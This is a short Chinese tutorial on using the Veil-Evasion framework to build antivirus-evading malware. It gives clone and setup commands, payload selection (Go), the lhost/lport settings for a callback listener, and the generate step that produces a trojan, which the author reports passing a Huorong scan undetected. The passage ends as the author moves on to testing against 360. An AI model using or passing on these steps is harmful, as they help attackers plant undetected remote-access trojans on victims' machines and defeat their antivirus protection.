Veil免杀过360火绒

这款工具是一款Python写的项目，在github已经开源，项目地址是：https://github.com/Veil-Framework/Veil-Evasion

安装命令如下：

git clone https://github.com/Veil-Framework/Veil-Evasion.git
cd Veil-Evasion
bash setup.sh -c

安装完成后，我们就可以使用python来运行veil.py文件。

 

 我们可以使用list命令查看有效负载，可以看到有很多语言让我们选择，包括go python c，powershell语言等等

我们这里就选择go吧，因为go语言生成的exe体积较小，这里需要两条命令配置我们的IP和端口。

 具体根据实际IP来决定。

set lhost 127.0.0.1
set lport 4444

配置完成后，输入generate 即可生成出一个马子。

然后放到火绒上面查杀一下，可以看到已经免杀成功。

但是为了确保实验的可行性，我还是准备了一套360快乐全家桶。